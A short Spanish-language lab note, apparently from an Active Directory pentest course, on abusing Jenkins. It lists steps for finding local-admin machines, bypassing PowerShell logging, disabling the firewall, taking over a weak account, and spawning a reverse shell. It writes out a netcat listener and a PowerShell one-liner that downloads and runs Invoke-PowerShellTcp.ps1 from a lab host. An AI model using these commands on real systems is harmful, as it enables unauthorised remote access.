Feature abuse (Jenkins)
Despues de obtener privilegios con administrador vemos en que maquina tenemos dicho privilegio
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
set computername
[snip]
Ahora vamos a vulnerar jenkins, (desactivar firewall)
- 1 desactivar firewall
- 2 account takeover: builderuser usa el mismo username como contraseΓ±a
- 3 revershe shell en build functionality
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
powershell.exe iex (iwr http://172.16.100.44/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.44 -Port 443
Test-NetConnection -ComputerName 172.16.99.44 -Port 80